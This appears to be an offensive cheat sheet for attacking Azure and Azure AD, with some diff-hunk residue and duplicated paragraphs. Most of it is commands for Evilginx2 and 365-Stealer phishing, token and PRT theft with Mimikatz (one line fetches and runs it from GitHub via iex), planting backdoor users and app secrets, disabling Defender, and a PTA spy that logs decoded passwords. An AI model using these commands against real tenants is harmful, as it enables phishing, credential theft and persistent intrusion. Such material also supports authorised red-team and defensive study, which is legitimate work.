# List all keyvaults
PS Az> Get-AzKeyVault
## Phishing with Evilginx2
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp
: config ip
: phishlets hostname o365 login.username.corp
: phishlets get-hosts o365
Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine
# copy certificate and enable the phishing
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
: phishlets enable o365
# get the phishing URL
: lures create o365
: lures get-url 0
## Illicit Consent Grant
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
* **Disable user consent** : Users cannot grant permissions to applications.
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
* **Custom app consent policy**
### Register Application
1. Login to https://portal.azure.com > Azure Active Directory
2. Click on **App registrations** > **New registration**
3. Enter the Name for our application
4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"**
5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://<DOMAIN/IP>:<PORT>/login/authorized`.
6. Click **Register** and save the **Application ID**
### Configure Application
1. Click on `Certificates & secrets`
2. Click on `New client secret` then enter the **Description** and click on **Add**.
3. Save the **secret**'s value.
4. Click on API permissions > Add a permission
5. Click on Microsoft Graph > **Delegated permissions**
6. Search and select the below mentioned permissions and click on Add permission
* Contacts.Read
* Mail.Read / Mail.ReadWrite
* Mail.Send
* Notes.Read.All
* Mailboxsettings.ReadWrite
* Files.ReadWrite.All
* User.ReadBasic.All
* User.Read
### Setup 365-Stealer
:warning: Default port for 365-Stealer phishing is 443
- Run XAMPP and start Apache
- Clone 365-Stealer into `C:\xampp\htdocs\`
* `git clone https://github.com/AlteredSecurity/365-Stealer.git`
- Install the requirements
* Python3
* PHP CLI or Xampp server
* `pip install -r requirements.txt`
- Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache
- Edit `C:/xampp/htdocs/yourvictims/index.php` if needed
- Disable IP whitelisting `$enableIpWhiteList = false;`
- Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims)
- **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered.
- **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created.
- **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https://<Domain/IP>/login/authorized`
- **Macros Location**: Path of macro file that we want to inject.
- **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc.
- **Delay**: Delay the request by specifying time in seconds while stealing
- Create a Self Signed Certificate to use HTTPS
- Run the application either click on the button or run this command : `python 365-Stealer.py --run-app`
- `--no-ssl`: disable HTTPS
- `--port`: change the default listening port
- `--token`: provide a specific token
- `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
- Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
## Token from Managed Identity
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
Find IDENTITY_HEADER and IDENTITY_ENDPOINT from the environment : `env`
Most of the time, you want a token for one of these resources:
* https://storage.azure.com
* https://vault.azure.net
* https://graph.microsoft.com
* https://management.azure.com
### Azure API via Powershell
Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
Then query the Azure REST API to get the **subscription ID** and more .
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
(Invoke-RestMethod @RequestParams).value
# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
### Azure API via Python Version
print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("ClientID/AccountID: "+json.loads(val)["client_id"])
or inside a Python Function:
import logging, os
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
### Get Tokens
:warning: The lifetime of a Primary Refresh Token is 14 days!
# az cli - get tokens
az account get-access-token
az account get-access-token --resource-type aad-graph
# or Az
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
# or from a managed identity using IDENTITY_HEADER and IDENTITY_ENDPOINT
### Use Tokens
> Tokens contain all the claims including that for MFA and Conditional Access
* Az Powershell
PS C:\Tools> $token = 'eyJ0e..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId <ACCOUNT-ID>
# Access Token and Graph Token
PS C:\Tools> $token = 'eyJ0eX..'
PS C:\Tools> $graphaccesstoken = 'eyJ0eX..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
PS C:\Tools> Get-AzResource
# ERROR: 'this.Client.SubscriptionId' cannot be null.
# ---> The managed identity has no rights on any of the Azure resources. Switch to to GraphAPI
* AzureAD
Import-Module C:\Tools\AzureAD\AzureAD.psd1
$AADToken = 'eyJ0…'
Connect-AzureAD -AadAccessToken $AADToken -TenantId <TENANT-ID> -AccountId <ACCOUNT-ID>
### Refresh Tokens
* https://github.com/ConstantinT/Lantern
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password )
* https://github.com/rvrsh3ll/TokenTactics
Import-Module .\TokenTactics.psd1
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Token 0.0.1 TokenTactics
Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics
Function Forge-UserAgent 0.0.1 TokenTactics
Function Get-AzureToken 0.0.1 TokenTactics
Function Get-TenantID 0.0.1 TokenTactics
Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics
Function Parse-JWTtoken 0.0.1 TokenTactics
Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics
Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics
Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics
Function RefreshTo-GraphToken 0.0.1 TokenTactics
Function RefreshTo-MAMToken 0.0.1 TokenTactics
Function RefreshTo-MSGraphToken 0.0.1 TokenTactics
Function RefreshTo-MSManageToken 0.0.1 TokenTactics
Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics
Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics
Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics
Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics
Function RefreshTo-OutlookToken 0.0.1 TokenTactics
Function RefreshTo-SubstrateToken 0.0.1 TokenTactics
## Stealing Tokens
* Get-AzurePasswords
Import-Module Microburst.psm1
Get-AzurePasswords -Verbose | Out-GridView
### Stealing tokens from az cli
* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\<username>\.Azure`
* azureProfile.json in the same directory contains information about subscriptions.
### Stealing tokens from az powershell
* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\<username>\.Azure`
* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json**
* Users can save tokens using `Save-AzContext`
## Add credentials to all Enterprise Applications
# Add secrets
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
# Use secrets to authenticate as Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
## Spawn SSH for Azure Web App
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - testsecure.blob.core.windows.net
Found Storage Account - securetest.blob.core.windows.net
Found Storage Account - securedata.blob.core.windows.net
Found Storage Account - securefiles.blob.core.windows.net
Found Storage Account - securefilestorage.blob.core.windows.net
Found Storage Account - securestorageaccount.blob.core.windows.net
Found Storage Account - securesql.blob.core.windows.net
Found Storage Account - hrsecure.blob.core.windows.net
Found Storage Account - secureit.blob.core.windows.net
Found Storage Account - secureimages.blob.core.windows.net
Found Storage Account - securestorage.blob.core.windows.net
Bing Found Storage Account - notrealstorage.blob.core.windows.net
Found Container - hrsecure.blob.core.windows.net/NETSPItest
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
### List and download blobs
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
## Runbook Automation
### Create a Runbook
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group
az ad signed-in-user list-owned-objects
# If the user is not part of an "Automation" group.
# Add him to a custom group , e.g: "Automation Admins"
Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
# Create a Powershell Runbook
PS C:\Tools> Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
### Persistence via Automation accounts
* Create a new Automation Account
* "Create Azure Run As account": Yes
* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
* Sample runbook for this Blog located here https://github.com/NetSPI/MicroBurst
* Publish the runbook
* Add a webhook to the runbook
* Add the AzureAD module to the Automation account
* Update the Azure Automation Modules
* Assign "User Administrator" and "Subscription Owner" rights to the automation account
* Eventually lose your access…
* Trigger the webhook with a post request to create the new user
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
## Virtual Machine RunCommand
* `Microsoft.Compute/virtualMachines/runCommand/action`
# Get Public IP of VM : query the network interface
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
# Execute Powershell script on the VM
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
# Connect via WinRM
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Tools> Enter-PSSession $sess
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
# List available VMs
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
# Execute Powershell script on the VM
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Against the whole subscription using MicroBurst.ps1
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
## Azure AD vs Active Directory
## KeyVault Secrets
# keyvault access token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
# connect
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
# query the vault and the secrets
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
## Pass The PRT
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
# Run mimikatz to obtain the PRT
PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
# Copy the PRT and KeyValue
Mimikatz> privilege::debug
Mimikatz> token::elevate
Mimikatz> dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect
# Copy the Context, ClearKey and DerivedKey
Mimikatz> dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>
# Generate a JWT
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> $PRT_OF_USER = '...'
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
PS AADInternals> $ClearKey = "XXYYZZ..."
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey GetNonce
The `<Signed JWT>` (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session for https://login.microsoftonline.com/login.srf.
Edit the Chrome cookie (F12) -> Application -> Cookies with the values:
Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
HttpOnly: √
:warning: Mark the cookie with the flags `HTTPOnly` and `Secure`.
## Pass The Certificate
Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username Verbose
Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
# Require the PRT, TenantID, Context and DerivedKey
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
# PFX saved with the name <Username>@<TENANT NAME>.onmicrosoft.com.pfx and password AzureADCert
Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
Main.py --usercert "admin.pfx" --certpass password --remoteip
python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
certpass AzureADCert --remoteip --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"
## Intunes Administration
* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"`
1. Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT
2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
3. Go to **Scripts** and click on **Add** for Windows 10.
4. Add a **Powershell script**
5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
:warning: It will take up to one hour before you script is executed !
## Dynamic Group Membership
Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`
Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")`
Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group
1. Open user's profile, click on **Manage**
2. Click on **Resend** invite and to get an invitation URL
3. Set the secondary email
PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose
## Administrative Unit
> Administrative Unit can reset password of another user
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose
## Deployment Template
PS Az> Get-AzResourceGroup
PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP
# Export
PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
## Application Proxy
# Enumerate application that have Proxy
PS C:\Tools> Get-AzureADApplication | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"}
PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1
PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT-ID>
## Conditional Access
* Bypassing conditional access by copying User-Agent (Chrome Dev Tool > Select iPad Pro, etc)
* Bypassing conditional access by faking device compliance
# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
## Azure AD
With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD.
1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
2. Change your browser URL to: https://azure.microsoft.com/
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!
### Azure AD vs Active Directory
| Active Directory | Azure AD |
@ -164,7 +934,6 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest
| Domain/forest | Tenant |
| Trusts | Guests |
* Password Hash Syncronization (PHS)
* Passwords from on-premise AD are sent to the cloud
* Use replication via a service account created by AD Connect
@ -173,137 +942,13 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest
* Connect Windows Server AD to Azure AD using Federation Server (ADFS)
* Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
## Azure AD - Enumeration
> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph.
* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large
Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`.
$ git clone https://github.com/dirkjanm/ROADtools
$ pip install roadrecon
$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
$ roadrecon dump
$ roadrecon gui
Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD
PS C:\> git clone https://github.com/adrecon/AzureADRecon.git
PS C:\> Install-Module -Name AzureAD
PS C:\> .\AzureADRecon.ps1
PS C:\> $username = "username@fqdn"
PS C:\> $passwd = ConvertTo-SecureString "PlainTextPassword" -AsPlainText -Force
PS C:\> $creds = New-Object System.Management.Automation.PSCredential ($username, $passwd)
PS C:\> .\AzureADRecon.ps1 -Credential $creds
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
Stormspotter, graphing Azure and Azure Active Directory objects
$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
git clone https://github.com/Azure/Stormspotter
cd Stormspotter
pipenv install .
stormspotter --cli
stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
Browse to to interact with the graph.
Other interesting commands to enumerate Azure AD.
# Azure AD powershell module
# MSOnline powershell module
Get-MsolRoleMember -RoleObjectId XXXXXXXXXX-XXXX-XXXX... | fl
#Connect to Azure AD using Powershell
install-module azuread
import-module azuread
get-module azuread
# Get list of users with role global admins# Note that role =! group
$role = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Company Administrator'}
Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
# Get all groups and an example using filter
Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
# Get Azure AD policy
# Get Azure AD roles with some examples
Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Security Reader'}
# Get Azure AD SPNs
# Log in using Azure CLI (this is not powershell)
az login --allow-no-subscriptions
# Get member list using Azure CLI
az ad group member list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --group='Company Administrators'
# Get user list
az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --upn='username@domain.com'
#PS script to get array of users / roles
$roleUsers = @()
ForEach($role in $roles) {
$users=Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
ForEach($user in $users) {
write-host $role.DisplayName,$user.DisplayName
$obj = New-Object PSCustomObject
$obj | Add-Member -type NoteProperty -name RoleName -value ""
$obj | Add-Member -type NoteProperty -name UserDisplayName -value ""
$obj | Add-Member -type NoteProperty -name IsAdSynced -value false
$obj.IsAdSynced=$user.DirSyncEnabled -eq $true
### Enumeration using Microburst
git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1
Import-Module .\MicroBurst.psm1
# Anonymous enumeration
Invoke-EnumerateAzureBlobs -Base company
Invoke-EnumerateAzureSubDomains -base company -verbose
# Authencticated enumeration
Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo
With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD.
1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
2. Change your browser URL to: https://azure.microsoft.com/
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!
## Azure AD - Password Spray
### Password Spray
> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds
@ -320,7 +965,7 @@ Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
## Azure AD - Convert GUID to SID
### Convert GUID to SID
The user's AAD id is translated to SID by concatenating `"S-1121-"` to the decimal representation of each section of the AAD Id.
@ -331,26 +976,38 @@ SID: S-1121-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
For example, the representation of `6aa89ecb-1f8f-4d92810d-b0dce30b6c82` is `S-11211789435595130142196737025253132188119011`
## Azure AD - Sign in with a service principal
## Azure AD Connect
Check if Azure AD Connect is installed : `Get-ADSyncConnector`
:warning: Service Principal accounts do not require MFA. Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.
* For **PHS**, we can extract the credentials
* For **PTA**, we can install the agent
* For **Federation**, we can extract the certificate from ADFS server using DA
* Password based authentication
PS > Set-MpPreference -DisableRealtimeMonitoring $true
PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
PS > Get-AADIntSyncCredentials
# Get Token for SYNC account and reset on-prem admin password
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds SaveToCache
PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule`
2. Install a PTA Backdoor
# Use the service principal ID for the username
$pscredential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $pscredential -Tenant $tenantId
* Certificate based authentication
Connect-AzAccount -ApplicationId $appId -Tenant $tenantId -CertificateThumbprint <thumbprint>
PS AADInternals> Install-AADIntPTASpy
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
## Azure AD Connect - Password extraction
